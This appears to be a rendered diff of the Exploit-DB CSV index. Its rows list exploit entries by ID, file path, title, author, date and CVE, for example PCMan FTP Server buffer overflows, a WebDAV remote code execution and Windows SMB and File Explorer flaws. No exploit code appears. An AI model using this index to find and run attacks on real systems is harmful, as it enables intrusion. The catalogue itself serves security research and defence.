40713,exploits/windows/remote/40713.py,"PCMan FTP Server 2.0.7 - 'SITE CHMOD' Remote Buffer Overflow",2016-11-04,"Luis Noriega",remote,windows,,2016-11-04,2016-11-04,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-04-at-122818.png,http://www.exploit-db.comPCMan.7z,
|
||||||
40680,exploits/windows/remote/40680.py,"PCMan FTP Server 2.0.7 - 'UMASK' Remote Buffer Overflow",2016-11-02,Eagleblack,remote,windows,,2016-11-02,2016-11-02,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-02-at-135629.png,http://www.exploit-db.comPCMan.7z,
|
40680,exploits/windows/remote/40680.py,"PCMan FTP Server 2.0.7 - 'UMASK' Remote Buffer Overflow",2016-11-02,Eagleblack,remote,windows,,2016-11-02,2016-11-02,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-02-at-135629.png,http://www.exploit-db.comPCMan.7z,
|
||||||
|
52326,exploits/windows/remote/52326.txt,"PCMan FTP Server 2.0.7 - Buffer Overflow",2025-06-15,"Fernando Mengali",remote,windows,,2025-06-15,2025-06-15,0,CVE-2025-4255,,,,,
|
||||||
38340,exploits/windows/remote/38340.py,"PCMan FTP Server 2.0.7 - Directory Traversal",2015-09-28,"Jay Turla",remote,windows,21,2015-09-28,2015-09-28,0,CVE-2015-7601;OSVDB-128191,,,,http://www.exploit-db.comPCMan.7z,
|
38340,exploits/windows/remote/38340.py,"PCMan FTP Server 2.0.7 - Directory Traversal",2015-09-28,"Jay Turla",remote,windows,21,2015-09-28,2015-09-28,0,CVE-2015-7601;OSVDB-128191,,,,http://www.exploit-db.comPCMan.7z,
|
||||||
27007,exploits/windows/remote/27007.rb,"PCMan FTP Server 2.0.7 - Remote (Metasploit)",2013-07-22,MSJ,remote,windows,21,2013-07-22,2013-07-22,1,OSVDB-94624;CVE-2013-4730,"Metasploit Framework (MSF)",,,http://www.exploit-db.comPCMan.7z,
|
27007,exploits/windows/remote/27007.rb,"PCMan FTP Server 2.0.7 - Remote (Metasploit)",2013-07-22,MSJ,remote,windows,21,2013-07-22,2013-07-22,1,OSVDB-94624;CVE-2013-4730,"Metasploit Framework (MSF)",,,http://www.exploit-db.comPCMan.7z,
|
||||||
26471,exploits/windows/remote/26471.NA,"PCMan FTP Server 2.0.7 - Remote Buffer Overflow",2013-06-27,"Jacob Holcomb",remote,windows,21,2013-06-27,2025-06-13,0,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
|
|
||||||
31254,exploits/windows/remote/31254.py,"PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
|
31254,exploits/windows/remote/31254.py,"PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
|
||||||
31255,exploits/windows/remote/31255.py,"PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
|
31255,exploits/windows/remote/31255.py,"PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
|
||||||
27277,exploits/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Remote Buffer Overflow",2013-08-02,Ottomatik,remote,windows,,2013-08-02,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,http://www.exploit-db.com/screenshots/idlt27500/screen-shot-2013-08-08-at-34942-pm.png,http://www.exploit-db.comPCMan.7z,
|
27277,exploits/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Remote Buffer Overflow",2013-08-02,Ottomatik,remote,windows,,2013-08-02,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,http://www.exploit-db.com/screenshots/idlt27500/screen-shot-2013-08-08-at-34942-pm.png,http://www.exploit-db.comPCMan.7z,
|
||||||
|
@ -45908,6 +45914,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
||||||
7521,exploits/windows/remote/7521.txt,"WebcamXP 5.3.2.375 - Remote File Disclosure",2008-12-19,nicx0,remote,windows,,2008-12-18,,1,OSVDB-50884;CVE-2008-5862,,,,,
|
7521,exploits/windows/remote/7521.txt,"WebcamXP 5.3.2.375 - Remote File Disclosure",2008-12-19,nicx0,remote,windows,,2008-12-18,,1,OSVDB-50884;CVE-2008-5862,,,,,
|
||||||
51765,exploits/windows/remote/51765.txt,"WebCatalog 48.4 - Arbitrary Protocol Execution",2024-02-02,ItsSixtyN3in,remote,windows,,2024-02-02,2024-02-02,0,,,,,,
|
51765,exploits/windows/remote/51765.txt,"WebCatalog 48.4 - Arbitrary Protocol Execution",2024-02-02,ItsSixtyN3in,remote,windows,,2024-02-02,2024-02-02,0,,,,,,
|
||||||
16550,exploits/windows/remote/16550.rb,"WebDAV - Application DLL Hijacker (Metasploit)",2010-09-24,Metasploit,remote,windows,,2010-09-24,2011-03-10,1,,"Metasploit Framework (MSF)",,,,
|
16550,exploits/windows/remote/16550.rb,"WebDAV - Application DLL Hijacker (Metasploit)",2010-09-24,Metasploit,remote,windows,,2010-09-24,2011-03-10,1,,"Metasploit Framework (MSF)",,,,
|
||||||
|
52334,exploits/windows/remote/52334.NA,"WebDAV Windows 10 - Remote Code Execution (RCE)",2025-06-15,"Dev Bui Hieu",remote,windows,,2025-06-15,2025-06-15,0,,,,,,
|
||||||
3913,exploits/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Remote Buffer Overflow",2007-05-12,vade79,remote,windows,8080,2007-05-11,2016-09-29,1,OSVDB-40741;CVE-2007-2668,,,,http://www.exploit-db.comwebdesproxy-win32.tgz,
|
3913,exploits/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Remote Buffer Overflow",2007-05-12,vade79,remote,windows,8080,2007-05-11,2016-09-29,1,OSVDB-40741;CVE-2007-2668,,,,http://www.exploit-db.comwebdesproxy-win32.tgz,
|
||||||
37165,exploits/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Remote Buffer Overflow",2015-06-01,metacom,remote,windows,,2015-06-01,2016-03-08,1,,,,,,
|
37165,exploits/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Remote Buffer Overflow",2015-06-01,metacom,remote,windows,,2015-06-01,2016-03-08,1,,,,,,
|
||||||
45695,exploits/windows/remote/45695.rb,"WebExec - (Authenticated) User Code Execution (Metasploit)",2018-10-25,Metasploit,remote,windows,,2018-10-25,2019-03-17,1,CVE-2018-15442,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/2ab9a003d40e436e2f1099d0d164b76a0c2d4d33/modules/exploits/windows/smb/webexec.rb
|
45695,exploits/windows/remote/45695.rb,"WebExec - (Authenticated) User Code Execution (Metasploit)",2018-10-25,Metasploit,remote,windows,,2018-10-25,2019-03-17,1,CVE-2018-15442,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/2ab9a003d40e436e2f1099d0d164b76a0c2d4d33/modules/exploits/windows/smb/webexec.rb
|
||||||
|
@ -45957,6 +45964,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
||||||
41073,exploits/windows/remote/41073.py,"WinaXe Plus 8.7 - Remote Buffer Overflow",2017-01-16,"Peter Baris",remote,windows,,2017-01-16,2017-01-16,1,,,,http://www.exploit-db.com/screenshots/idlt41500/screen-shot-2017-01-16-at-152056.png,http://www.exploit-db.comwinaxep.exe,
|
41073,exploits/windows/remote/41073.py,"WinaXe Plus 8.7 - Remote Buffer Overflow",2017-01-16,"Peter Baris",remote,windows,,2017-01-16,2017-01-16,1,,,,http://www.exploit-db.com/screenshots/idlt41500/screen-shot-2017-01-16-at-152056.png,http://www.exploit-db.comwinaxep.exe,
|
||||||
16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,,
|
16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,,
|
||||||
51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,,
|
51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,,
|
||||||
|
52330,exploits/windows/remote/52330.py,"Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)",2025-06-15,"Mohammed Idrees Banyamer",remote,windows,,2025-06-15,2025-06-15,0,CVE-2025-33073,,,,,
|
||||||
52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
|
52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
|
||||||
52325,exploits/windows/remote/52325.py,"Windows File Explorer Windows 10 Pro x64 - TAR Extraction",2025-06-13,"Daniel Miranda",remote,windows,,2025-06-13,2025-06-13,0,CVE-2025-24071,,,,,
|
52325,exploits/windows/remote/52325.py,"Windows File Explorer Windows 10 Pro x64 - TAR Extraction",2025-06-13,"Daniel Miranda",remote,windows,,2025-06-13,2025-06-13,0,CVE-2025-24071,,,,,
|
||||||
52310,exploits/windows/remote/52310.py,"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure",2025-05-29,"Mohammed Idrees Banyamer",remote,windows,,2025-05-29,2025-05-29,0,CVE-2025-24071,,,,,
|
52310,exploits/windows/remote/52310.py,"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure",2025-05-29,"Mohammed Idrees Banyamer",remote,windows,,2025-05-29,2025-05-29,0,CVE-2025-24071,,,,,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue